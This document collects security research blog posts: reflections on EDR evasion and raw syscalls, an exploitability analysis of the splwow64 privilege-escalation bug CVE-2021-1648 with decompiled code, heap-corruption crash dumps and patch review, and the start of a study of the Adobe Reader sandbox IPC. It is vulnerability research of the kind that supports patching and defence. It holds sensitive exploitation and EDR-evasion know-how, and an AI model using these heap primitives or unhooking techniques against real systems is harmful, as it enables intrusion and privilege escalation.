In short, much of the testing we do against these new EDR solutions is rather unscientific. That’s largely a result of our inability to both peer into the state of an agent’s model while also deterministically assessing its capabilities. Testing in a limped state (ie. offline, with cloud connectivity blackholed, etc.) and restarting VMs after every test provides some basic insight but we lose a significant chunk of EDR capability. Isolation is difficult.

anyway

These things, when taken together, motivate my reluctance to embrace the strategy in much of my tooling. I’ve found scant cases in which a raw syscall was preferable to some other technique and I’ve become exhausted by the veracity of some tooling claims. The EDRs today are not the EDRs of our red teaming forefathers; testing is complicated, telemetry insight is improving, and data sets and enterprise security budgets are growing. We’ve got to get better at quantifying and substantiating our tool testing/analysis, and we need to improve the conversation surrounding the technologies.

I have a few brief, unsolicited thoughts for both red teams and EDR vendors based on my years of experience in this space. I’d love to hear others.

for EDR

Do not rely on user mode hooks and, more importantly, do not implicitly trust it. Seriously. Even if you’re monitoring hook integrity from the kernel, there are too many variables and too many opportunities for malicious code to tamper with or otherwise corrupt the hook or the integrity of the incoming data. Consider this from a performance perspective if you need to. I know you think you’re being cute by:

  1. Monitoring your hot patches for modification
  2. Encrypting telemetry
  3. Transmitting telemetry via clandestine/obscure methods (I see you NtQuerySystemInformation)
  4. “Validating” client processes

The fact is anything emitted from an unsigned, untrusted, user mode process can be corrupted. Put your efforts into consuming ETW and registering callbacks on all important routines, PPL’ing your user mode services, and locking down your IPC and general communication channels. Consume AMSI if you must, with the same caveat as user mode hooks: it is a data sink, and not necessarily one of truth.

The more you can consume in the kernel (maybe a trustlet some day?), the more difficult you are to tamper with. There is of course the ability for red team to wormhole into the kernel and attack your driver, but this is another hurdle for an attacker to leap, and yet another opportunity to catch them.

for red team

Using raw syscalls is but a small component of a greater system — evasion is less a set of techniques and more a system of behaviors. Consider that the hooks themselves are not the problem, but rather what the hooks do. I had to edit myself several times here to not reference the spoon quote from the Matrix, but it’s apt, if cliche.

There are also more effective methods of evading user mode hooks than raw syscalling. I’ve discussed some of them publicly in the past, but urge you to investigate the machinations of the EDR hooks themselves. I’d argue even IAT/inline unhooking is more effective, in some cases.

Cloud capabilities are the truly scary expansion. Sample submission, cloud telemetry aggregation and analysis, and manual/automatic hunting services change the landscape of threat analysis. Not only can your telemetry be correlated or bolstered amongst nodes, it can be retroactively hunted and analyzed. This retroactive capability, often provided by backend automation or threat hunting teams (hi Overwatch!) can be quite effective at improving an enterprises agent models. And not only one enterprises model; consider the fact that these data points are shared amongst all vendor subscribers, used to subsequently improve those agent models. Burning a technique is no longer isolated to a technology or a client.

On Exploiting CVE-2021-1648 (splwow64 LPE)

10 March 2021 at 21:10

In this post we’ll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.

This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it’s unclear from the original GP0 description if the bug was discovered in the wild, k0shl later detailed that it was his bug reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. Seems, then, that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.

This particular vector has a sordid history that’s probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kasperksy in their great analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We’ll look at how they finally chose to patch the bug later — for now.

I won’t regurgitate how the LPC interface works; for that, I recommend reading Kaspersky’s Operation Powerfall post[3] as well as the blog by ByteRaptor[4]. Both of these cover the architecture of the vector well enough to understand what’s happening. Instead, we’ll focus on what’s changed since CVE-2020-0986.

To catch you up very briefly, though: splwow64 exposes an LPC endpoint that any process can connect to and send requests. These requests carry opcodes and input parameters to a variety of printer functions (OpenPrinter, ClosePrinter, etc.). These functions occasionally require pointers as input, and thus the input buffer needs to support those.

As alluded to, Microsoft chose to instead use offsets in the LPC request buffers instead of raw pointers. Since the input/output addresses were to be used in memcpy’s, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accomodate this need. Here’s UMPDPointerFromOffset:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int64 UMPDPointerFromOffset(unsigned int64 *lpOffset, int64 lpBufStart, unsigned int dwSize)
{
  unsigned int64 Offset;

  if ( lpOffset && lpBufStart )
  {
    Offset = *lpOffset;
    if ( !*lpOffset )
      return 1;
    if ( Offset <= 0x7FFFFFFF && Offset + dwSize <= 0x7FFFFFFF )
    {
      *lpOffset = Offset + lpBufStart;
      return 1;
    }
  }
  return 0;
}

So as per the GP0 post, the buffer addresses are indeed restricted to <=0x7fffffff. Implicit in this is also the fact that our offset is unsigned, meaning we can only work with positive numbers; therefore, if our target address is somewhere below our lpBufStart, we’re out of luck.

This new offset strategy kills the previous techniques used to exploit this vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a global function pointer. When request 0x6A is called, a function (bLoadSpooler) is used to resolve a dozen or so winspool functions used for interfacing with printers:

These global variables are “protected” by RtlEncodePointer, as detailed by Kaspersky[3], but this is relatively trivial to break when executing locally. Using the memcpy with arbitrary src/dst addresses, they were able to overwrite the function pointers and replace one with a call to LoadLibrary.

Unfortunately, now that offsets are used, we can no longer target any arbitrary address. Not only are we restricted to 32-bit addresses, but we are also restricted to addresses >= the message buffer and <= 0x7fffffff.

I had a few thoughts/strategies here. My first attempt was to target UMPD cookies. This was part of a mitigation added after 0986 as again described by Kaspersky. Essentially, in order to invoke the other functions available to splwow64, we need to open a handle to a target printer. Doing this, GDI creates a cookie for us and stores it in an internal linked list. The cookie is created by LoadUserModePrinterDriverEx and is of type UMPD:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
typedef struct _UMPD {
    DWORD               dwSignature;        // data structure signature
    struct _UMPD *      pNext;             // linked list pointer
    PDRIVER_INFO_2W     pDriverInfo2;       // pointer to driver info
    HINSTANCE           hInst;              // instance handle to user-mode printer driver module
    DWORD               dwFlags;            // misc. flags
    BOOL                bArtificialIncrement; // indicates if the ref cnt has been bumped up to
    DWORD               dwDriverVersion;    // version number of the loaded driver
    INT                 iRefCount;          // reference count
    struct ProxyPort *  pp;                 // UMPD proxy server
    KERNEL_PVOID        umpdCookie;         // cookie returned back from proxy
    PHPRINTERLIST       pHandleList;        // list of hPrinter's opened on the proxy server
    PFN                 apfn[INDEX_LAST];   // driver function table
} UMPD, *PUMPD;

When a request for a printer action comes in, GDI will check if the request contains a valid printer handle and a cookie for it exists. Conveniently, there’s a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0:006> dq poi(g_ulLastUmpdCookie-8)
00000000`00bce1e0  00000000`fedcba98 00000000`00000000
00000000`00bce1f0  00000000`00bcdee0 00007ffb`64dd0000
00000000`00bce200  00000000`00000001 00000001`00000000
00000000`00bce210  00000000`00000000 00000000`00000001
00000000`00bce220  00000000`00bc8440 00007ffb`64dd2550
00000000`00bce230  00007ffb`64dd2d20 00007ffb`64dd2ac0
00000000`00bce240  00007ffb`64dd2de0 00007ffb`64dd30f0
00000000`00bce250  00000000`00000000
0:006> dps poi(g_ulLastUmpdCookie-8)+(8*9) l5
00000000`00bce228  00007ffb`64dd2550 mxdwdrv!DrvEnablePDEV
00000000`00bce230  00007ffb`64dd2d20 mxdwdrv!DrvCompletePDEV
00000000`00bce238  00007ffb`64dd2ac0 mxdwdrv!DrvDisablePDEV
00000000`00bce240  00007ffb`64dd2de0 mxdwdrv!DrvEnableSurface
00000000`00bce248  00007ffb`64dd30f0 mxdwdrv!DrvDisableSurface

This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.

Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:

1
(MType = lpMsgBuf[1], MType >= 0x6A) && (MType <= 0x6B || MType - 109 <= 7) )

This effectively limits the functions we can call to 0x6a through 0x74, and the only times the function tables are referenced are prior to 0x6a.

Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it’s transformed from an offset to an address, but before it’s processed. Since the splwow64 process is disposable and we can crash it as often as we’d like without impacting system stability, it seems possible. After tinkering with heap allocations for awhile, I discovered a helpful primitive.

When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
MessageSize = 0;
if ( *(_WORD *)ProxyMsg == 0x20 && *((_QWORD *)this + 9) )
{
  MessageSize = *((_DWORD *)ProxyMsg + 10);
  if ( MessageSize - 16 > 0x7FFFFFEF )
    goto LABEL_66;
  lpMsgBuf = (unsigned int *)operator new[](MessageSize);
}

...

if ( lpMsgBuf )
{
  rMessageSize = MessageSize;
  memcpy_s(lpMsgBuf, MessageSize, *((const void *const *)ProxyMsg + 6), MessageSize);
  ...
}

Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What’s more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively returns free chunks of same sized requests, we can obtain reliable read/write into another message buffer. Here’s the leaked heap address after several runs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PortView 1008 heap: 0x0000000000DD9E90
PortView 1020 heap: 0x0000000002B43FE0
PortView 1036 heap: 0x0000000000DD9E90
PortView 1048 heap: 0x0000000002B43FE0
PortView 1060 heap: 0x0000000000DD9E90
PortView 1072 heap: 0x0000000002B43FE0
PortView 1084 heap: 0x0000000000DD9E90
PortView 1096 heap: 0x0000000002B43FE0
PortView 1108 heap: 0x0000000000DD9E90
PortView 1120 heap: 0x0000000002B43FE0
PortView 1132 heap: 0x0000000000DD9E90
PortView 1144 heap: 0x0000000002B43FE0
PortView 1156 heap: 0x0000000000DD9E90
PortView 1168 heap: 0x0000000002B43FE0
PortView 1180 heap: 0x0000000000DD9E90
PortView 1192 heap: 0x0000000002B43FE0
PortView 1204 heap: 0x0000000000DD9E90
PortView 1216 heap: 0x0000000002B43FE0
PortView 1228 heap: 0x0000000000DD9E90
PortView 1240 heap: 0x0000000002B43FE0

Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we’ve got a lot of control there.

After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it’s tiny (0x18 bytes) and doesn’t improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered “privileged”. How privileged, you ask? Well, let’s see what 0x76 does:

1
2
3
4
5
6
7
case 0x76u:
  v3 = *(_QWORD *)(lpMsgBuf + 32);
  if ( v3 )
  {
    memcpy_0(*(void **)(lpMsgBuf + 32), *(const void **)(lpMsgBuf + 24), *(unsigned int *)(lpMsgBuf + 40));
    *a2 = v3;
  }

A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.

After rigging up some threads to spray, I quickly identified a crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(1b4.1a9c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpAllocateHeap+0x833:
00007ff9`ab669e83 4d8b4a08        mov     r9,qword ptr [r10+8] ds:00000076`00000008=????????????????
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff9`ab6673d4     : 00000000`01500000 00000000`00800003 00000000`00002000 00000000`00002010 : ntdll!RtlpAllocateHeap+0x833
01 00007ff9`ab6b76e7     : 00000000`00000000 00000000`012a0180 00000000`00000000 00000000`00000000 : ntdll!RtlpAllocateHeapInternal+0x6d4
02 00007ff9`ab6b75f9     : 00000000`01500000 00000000`00000000 00000000`012a0180 00000000`00000080 : ntdll!RtlpAllocateUserBlockFromHeap+0x63
03 00007ff9`ab667eda     : 00000000`00000000 00000000`00000310 00000000`000f0000 00000000`00000001 : ntdll!RtlpAllocateUserBlock+0x111
04 00007ff9`ab666e2c     : 00000000`012a0000 00000000`00000000 00000000`00000300 00000000`00000000 : ntdll!RtlpLowFragHeapAllocFromContext+0x88a
05 00007ff9`a9f39d40     : 00000000`00000000 00000000`00000300 00000000`00000000 00007ff9`a9f70000 : ntdll!RtlpAllocateHeapInternal+0x12c
06 00007ff6`faeac57f     : 00000000`00000300 00000000`00000000 00000000`01509fd0 00000000`00000000 : msvcrt!malloc+0x70
07 00007ff6`faea7c76     : 00000000`00000300 00000000`01509fd0 00000000`015018e0 00000000`00000000 : splwow64!operator new+0x23
08 00007ff6`faea8ada     : 00000000`00000000 00000000`01501678 00000000`0150e340 00000000`0150e4f0 : splwow64!TLPCMgr::ProcessRequest+0x9e

That’s the format of our spray, but you’ll notice it’s crashing during allocation. Basically, the message buffer chunk was freed and we’ve managed to overwrite the freelist chunk’s forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.

Notably, we can also corrupt a busy chunk’s header, leading to a crash during the free process:

1
2
3
4
5
6
7
8
9
10
11
12
13
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ffe`1d5b7e42     : 00000000`00000000 00007ffe`1d6187f0 00000000`00000003 00000000`014d0000 : ntdll!RtlReportCriticalFailure+0x56
01 00007ffe`1d5b812a     : 00000000`00000003 00000000`02d7f440 00000000`014d0000 00000000`014d9fc8 : ntdll!RtlpHeapHandleError+0x12
02 00007ffe`1d5bdd61     : 00000000`00000000 00000000`014d0150 00000000`00000000 00000000`014d9fd0 : ntdll!RtlpHpHeapHandleError+0x7a
03 00007ffe`1d555869     : 00000000`014d9fc0 00000000`00000055 00000000`00000000 00007ffe`00000027 : ntdll!RtlpLogHeapFailure+0x45
04 00007ffe`1d4c0df1     : 00000000`014d02e8 00000000`00000055 00000000`00000001 00000000`00000055 : ntdll!RtlpHeapFindListLookupEntry+0x94029
05 00007ffe`1d4c480b     : 00000000`014d0000 00000000`014d9fc0 00000000`014d9fc0 00000000`00000080 : ntdll!RtlpFindEntry+0x4d
06 00007ffe`1d4c95c4     : 00000000`014d0000 00000000`014d0000 00000000`014d9fc0 00000000`014d0000 : ntdll!RtlpFreeHeap+0x3bbcd s
07 00007ffe`1d4c5d21     : 00000000`00000000 00000000`014d0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
08 00007ffe`1cdf9c9c     : 00000000`030c1490 00000000`014d9fd0 00000000`014d9fd0 00000000`00000000 : ntdll!RtlFreeHeap+0x51
09 00007ff7`28b8805d     : 00000000`030c1490 00000000`014d9fd0 00000000`00000000 00000000`00000000 : msvcrt!free+0x1c
0a 00007ff7`28b88ada     : 00000000`00000000 00000000`00000000 00000000`030c0cd0 00000000`030c0d00 : splwow64!TLPCMgr::ProcessRequest+0x485

This is an interesting primitive because it grants us full control over a heap chunk, both free and busy, but unlike the browser world, full of its class objects and vtables, our message buffer is flat, already assumed to be untrustworthy. This means we can’t just overwrite a function pointer or modify an object length. Furthermore, the lifespan of the object is quite short. Once the message has been processed and the response copied back to the shared memory region, the chunk is released.

I spent quite a bit of time digging into public work on NT/LF heap exploitation primitives in modern Windows 10, but came up empty. Most work these days focuses on browser heaps and, typically, abusing object fields to gain code execution or AAR/AAW. @scwuaptx[7] has a great paper on modern heap internals/primitives[6] and an example from a CTF in ‘19[5], but ends up using a FILE object to gain r/w which is unavailable here.

While I wasn’t able to take this to full code execution, I’m fairly confident this is doable provided the right heap primitive comes along. I was able to gain full control over a free and busy chunk with valid headers (leaking the heap encoding cookie), but Microsoft has killed all the public techniques, and I don’t have the motivation to find new ones (for now ;P).

The code is available on Github[8], which is based on the public PoC. It uses my technique described above to leak the heap cookie and smash a free chunk’s flink.

Patch

Microsoft patched this in January, just a few weeks after Project Zero FD’d the bug. They added a variety of things to the function, but the crux of the patch now requires a buffer size which is then used as a bounds check before performing memcpy’s.

GdiPrinterThunk now checks if DisableUmpdBufferSizeCheck is set in HKLM\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize. If it’s not, GdiPrinterThunk_Unpatched is used, otherwise, GdiPrinterThunk_Patched. I can only surmise that they didn’t want to break compatibility with…something, and decided to implement a hack while they work on a more complete solution (AppContainer..?). The new GdiPrinterThunk:

1
2
3
4
5
6
7
8
9
10
int GdiPrinterThunk(int MsgBuf, int MsgBufSize, int MsgOut, unsigned int MsgOutSize)
{
  int result;

  if ( gbIsUmpdBufferSizeCheckEnabled )
    result = GdiPrinterThunk_Patched(MsgBuf, MsgBufSize, (__int64 *)MsgOut, MsgOutSize);
  else
    result = GdiPrinterThunk_Unpatched(MsgBuf, (__int64 *)rval, rval);
  return result;
}

Along with the buf size they now also require the return buffer size and check to ensure it’s sufficiently large enough to hold output (this is supplied by the ProxyMsg in splwow64).

And the specific patch for the 0x6d memcpy:

1
2
3
4
5
6
7
8
9
10
11
12
13
SrcPtr = **MsgBuf_Off80;
if ( SrcPtr )
{
  SizeHigh = SrcPtr[34];
  DstPtr = *(void **)(MsgBuf + 88);
  dwCopySize = SizeHigh + SrcPtr[35];
  if ( DstPtr + dwCopySize <= _BufEnd        // ensure we don't write past the end of the MsgBuf
    && (unsigned int)dwCopySize >= SizeHigh  // ensure total is at least >= SizeHigh
    && (unsigned int)dwCopySize <= 0x1FFFE ) // sanity check WORD boundary
  {
    memcpy_0(DstPtr, SrcPtr, v276 + SrcPtr[35]);
  }
}

It’s a little funny at first and seems like an incomplete patch, but it’s because Microsoft has removed (or rather, inlined) all of the previous UMPDPointerFromOffset calls. It still exists, but it’s only called from within UMPDStringPointerFromOffset_Patched and now named UMPDPointerFromOffset_Patched. Here’s how they’ve replaced the source offset conversion/check:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
MCpySrcPtr = (unsigned __int64 *)(MsgBuf + 80);
if ( MsgBuf == -80 )
  goto LABEL_380;

MCpySrc = *MCpySrcPtr;
if ( *MCpySrcPtr )
{
  // check if the offset is less than the MsgBufSize and if it's at least 8 bytes past the src pointer struct (contains size words)
  if ( MCpySrc > (unsigned int)_MsgBufSize || (unsigned int)_MsgBufSize - MCpySrc < 8 )
    goto LABEL_380;
  
  // transform offset to pointer
  *MCpySrcPtr = MCpySrc + MsgBuf;
}

It seems messier this way, but is probably just compiler optimization. MCpySrc is the address of the source struct, which is:

1
2
3
4
5
typedef struct SrcPtr {
  DWORD offset;
  WORD SizeHigh;
  WORD SizeLow;
};

Size is likely split out for additional functionality in other LPC functions, but I didn’t bother figuring out why. The destination offset/pointer is resolved in a similar fashion.

Funny enough, the GdiPrinterThunk_Unpatched really is unpatched; the vulnerable memcpy code lives on.

References

[0] https://bugs.chromium.org/p/project-zero/issues/detail?id=2096
[1] https://whereisk0shl.top/post/the_story_of_cve_2021_1648
[2] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648
[3] https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/
[4] https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html
[5] https://github.com/scwuaptx/LazyFragmentationHeap/blob/master/LazyFragmentationHeap_slide.pdf
[6] https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version
[7] https://twitter.com/scwuaptx
[8] https://github.com/hatRiot/bugs/tree/master/cve20211648

Digging the Adobe Sandbox - IPC Internals

7 August 2020 at 21:10

This post kicks off a short series into reversing the Adobe Reader sandbox. I initially started this research early last year and have been working on it off and on since. This series will document the Reader sandbox internals, present a few tools for reversing/interacting with it, and a description of the results of this research. There may be quite a bit of content here, but I’ll be doing a lot of braindumping. I find posts that document process, failure, and attempt to be far more insightful as a researcher than pure technical result.

I’ve broken this research up into two posts. Maybe more, we’ll see. The first here will detail the internals of the sandbox and introduce a few tools developed, and the second will focus on fuzzing and the results of that effort.

This post focuses primarily on the IPC channel used to communicate between the sandboxed process and the broker. I do not delve into how the policy engine works or many of the restrictions enabled.

Introduction

This is by no means the first dive into the Adobe Reader sandbox. Here are a few prior examples of great work:

2011 – A Castle Made of Sand (Richard Johnson)
2011 – Playing in the Reader X Sandbox (Paul Sabanal and Mark Yason)
2012 – Breeding Sandworms (Zhenhua Liu and Guillaume Lovet)
2013 – When the Broker is Broken (Peter Vreugdenhil)

Breeding Sandworms was a particularly useful introduction to the sandbox, as it describes in some detail the internals of transaction and how they approached fuzzing the sandbox. I’ll detail my approach and improvements in part two of this series.

In addition, the ZDI crew of Abdul-Aziz Hariri, et al. have been hammering on the Javascript side of things for what seems like forever (Abusing Adobe Reader’s Javascript APIs) and have done some great work in this area.

After evaluating existing research, however, it seemed like there was more work to be done in a more open source fashion. Most sandbox escapes in Reader these days opt instead to target Windows itself via win32k/dxdiag/etc and not the sandbox broker. This makes some sense, but leaves a lot of attack surface unexplored.

Note that all research was done on Acrobat Reader DC 20.6.20034 on a Windows 10 machine. You can fetch installers for old versions of Adobe Reader here. I highly recommend bookmarking this. One of my favorite things to do on a new target is pull previous bugs and affected versions and run through root cause and exploitation.

Sandbox Internals Overview

Adobe Reader’s sandbox is known as protected mode and is on by default, but can be toggled on/off via preferences or the registry. Once Reader launches, a child process is spawned under low integrity and a shared memory section mapped in. Inter-process communication (IPC) takes place over this channel, with the parent process acting as the broker.

Adobe actually published some of the sandbox source code to Github over 7 years ago, but it does not contain any of their policies or modern tag interfaces. It’s useful for figuring out variables and function names during reversing, and the source code is well written and full of useful comments, so I recommend pulling it up.

Reader uses the Chromium sandbox (pre Mojo), and I recommend the following resources for the specifics here:

These days it’s known as the “legacy IPC” and has been replaced by Mojo in Chrome. Reader actually uses Mojo to communicate between its RdrCEF (Chromium Embedded Framework) processes which handle cloud connectivity, syncing, etc. It’s possible Adobe plans to replace the broker legacy API with Mojo at some point, but this has not been announced/released yet.

We’ll start by taking a brief look at how a target process is spawned, but the main focus of this post will be the guts of the IPC mechanisms in play. Execution of the child process first begins with BrokerServicesBase::SpawnTarget. This function crafts the target process and its restrictions. Some of these are described here in greater detail, but they are as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1. Create restricted token
 - via `CreateRestrictedToken`
 - Low integrity or AppContainer if available
2. Create restricted job object
 - No RW to clipboard
 - No access to user handles in other processes
 - No message broadcasts
 - No global hooks
 - No global atoms table access
 - No changes to display settings
 - No desktop switching/creation
 - No ExitWindows calls
 - No SystemParamtersInfo
 - One active process
 - Kill on close/unhandled exception

From here, the policy manager enforces interceptions, handled by the InterceptionManager, which handles hooking and rewiring various Win32 functions via the target process to the broker. According to documentation, this is not for security, but rather:

1
[..] designed to provide compatibility when code inside the sandbox cannot be modified to cope with sandbox restrictions. To save unnecessary IPCs, policy is also evaluated in the target process before making an IPC call, although this is not used as a security guarantee but merely a speed optimization.

From here we can now take a look at how the IPC mechanisms between the target and broker process actually work.

The broker process is responsible for spawning the target process, creating a shared memory mapping, and initializing the requisite data structures. This shared memory mapping is the medium in which the broker and target communicate and exchange data. If the target wants to make an IPC call, the following happens at a high level:

  1. The target finds a channel in a free state
  2. The target serializes the IPC call parameters to the channel
  3. The target then signals an event object for the channel (ping event)
  4. The target waits until a pong event is signaled

At this point, the broker executes ThreadPingEventReady, the IPC processor entry point, where the following occurs:

  1. The broker deserializes the call arguments in the channel
  2. Sanity checks the parameters and the call
  3. Executes the callback
  4. Writes the return structure back to the channel
  5. Signals that the call is completed (pong event)

There are 16 channels available for use, meaning that the broker can service up to 16 concurrent IPC requests at a time. The following diagram describes a high level view of this architecture:

From the broker’s perspective, a channel can be viewed like so:

In general, this describes what the IPC communication channel between the broker and target looks like. In the following sections we’ll take a look at these in more technical depth.

IPC Internals

The IPC facilities are established via TargetProcess::Init, and is really what we’re most interested in. The following snippet describes how the shared memory mapping is created and established between the broker and target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
  DWORD shared_mem_size = static_cast<DWORD>(shared_IPC_size +
                                             shared_policy_size);
  shared_section_.Set(::CreateFileMappingW(INVALID_HANDLE_VALUE, NULL,
                                           PAGE_READWRITE | SEC_COMMIT,
                                           0, shared_mem_size, NULL));
  if (!shared_section_.IsValid()) {
    return ::GetLastError();
  }

  DWORD access = FILE_MAP_READ | FILE_MAP_WRITE;
  base::win::ScopedHandle target_shared_section;
  if (!::DuplicateHandle(::GetCurrentProcess(), shared_section_,
                         sandbox_process_info_.process_handle(),
                         target_shared_section.Receive(), access, FALSE, 0)) {
    return ::GetLastError();
  }

  void* shared_memory = ::MapViewOfFile(shared_section_,
                                        FILE_MAP_WRITE|FILE_MAP_READ,
                                        0, 0, 0);

The calculated shared_mem_size in the source code here comes out to 65536 bytes, which isn’t right. The shared section is actually 0x20000 bytes in modern Reader binaries.

Once the mapping is established and policies copied in, the SharedMemIPCServer is initialized, and this is where things finally get interesting. SharedMemIPCServer initializes the ping/pong events for communication, creates channels, and registers callbacks.

The previous architecture diagram provides an overview of the structures and layout of the section at runtime. In short, a ServerControl is a broker-side view of an IPC channel. It contains the server side event handles, pointers to both the channel and its buffer, and general information about the connected IPC endpoint. This structure is not visible to the target process and exists only in the broker.

A ChannelControl is the target process version of a ServerControl; it contains the target’s event handles, the state of the channel, and information about where to find the channel buffer. This channel buffer is where the CrossCallParams can be found as well as the call return information after a successful IPC dispatch.

Let’s walk through what an actual request looks like. Making an IPC request requires the target to first prepare a CrossCallParams structure. This is defined as a class, but we can model it as a struct:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
const size_t kExtendedReturnCount = 8;

struct CrossCallParams {
  uint32 tag_;
  uint32 is_in_out_;
  CrossCallReturn call_return;
  size_t params_count_;
};

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

union MultiType {
  uint32 unsigned_int;
  void* pointer;
  HANDLE handle;
  ULONG_PTR ulong_ptr;
};

I’ve also gone ahead and defined a few other structures needed to complete the picture. Note that the return structure, CrossCallReturn, is embedded within the body of the CrossCallParams.

There’s a great ASCII diagram provided in the sandbox source code that’s highly instructive, and I’ve duplicated it below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// [ tag                4 bytes]
// [ IsOnOut            4 bytes]
// [ call return       52 bytes]
// [ params count       4 bytes]
// [ parameter 0 type   4 bytes]
// [ parameter 0 offset 4 bytes] ---delta to ---\
// [ parameter 0 size   4 bytes]                |
// [ parameter 1 type   4 bytes]                |
// [ parameter 1 offset 4 bytes] ---------------|--\
// [ parameter 1 size   4 bytes]                |  |
// [ parameter 2 type   4 bytes]                |  |
// [ parameter 2 offset 4 bytes] ----------------------\
// [ parameter 2 size   4 bytes]                |  |   |
// |---------------------------|                |  |   |
// | value 0     (x bytes)     | <--------------/  |   |
// | value 1     (y bytes)     | <-----------------/   |
// |                           |                       |
// | end of buffer             | <---------------------/
// |---------------------------|

A tag is a dword indicating which function we’re invoking (just a number between 1 and approximately 255, depending on your version). This is handled server side dynamically, and we’ll explore that further later on.

Each parameter is then sequentially represented by a ParamInfo structure:

1
2
3
4
5
struct ParamInfo {
  ArgType type_;
  ptrdiff_t offset_;
  size_t size_;
};

The offset is the delta value to a region of memory somewhere below the CrossCallParams structure. This is handled in the Chromium source code via the ptrdiff_t type.

Let’s look at a call in memory from the target’s perspective. Assume the channel buffer is at 0x2a10134:

1
2
3
4
5
6
7
8
9
0:009> dd 2a10000+0x134
02a10134  00000003 00000000 00000000 00000000
02a10144  00000000 00000000 000002cc 00000001
02a10154  00000000 00000000 00000000 00000000
02a10164  00000000 00000000 00000000 00000007
02a10174  00000001 000000a0 00000086 00000002
02a10184  00000128 00000004 00000002 00000130
02a10194  00000004 00000002 00000138 00000004
02a101a4  00000002 00000140 00000004 00000002

0x2a10134 shows we’re invoking tag 3, which carries 7 parameters (0x2a10170). The first argument is type 0x1 (we’ll describe types later on), is at delta offset 0xa0, and is 0x86 bytes in size. Thus:

1
2
3
4
5
6
7
8
9
10
11
12
13
0:009> dd 2a10000+0x134+0xa0
02a101d4  003f005c 005c003f 003a0043 0055005c
02a101e4  00650073 00730072 0062005c 0061006a
02a101f4  006a0066 0041005c 00700070 00610044
02a10204  00610074 004c005c 0063006f 006c0061
02a10214  006f004c 005c0077 00640041 0062006f
02a10224  005c0065 00630041 006f0072 00610062
02a10234  005c0074 00430044 0052005c 00610065
02a10244  00650064 004d0072 00730065 00610073
0:009> du 2a10000+0x134+0xa0
02a101d4  "\??\C:\Users\bjaff\AppData\Local"
02a10214  "Low\Adobe\Acrobat\DC\ReaderMessa"
02a10254  "ges"

This shows the delta of the parameter data and, based on the parameter type, we know it’s a unicode string.

With this information, we can craft a buffer targeting IPC tag 3 and move onto sending it. To do this, we require the IPCControl structure. This is a simple structure defined at the start of the IPC shared memory section:

1
2
3
4
5
struct IPCControl {
    size_t channels_count;
    HANDLE server_alive;
    ChannelControl channels[1];
};

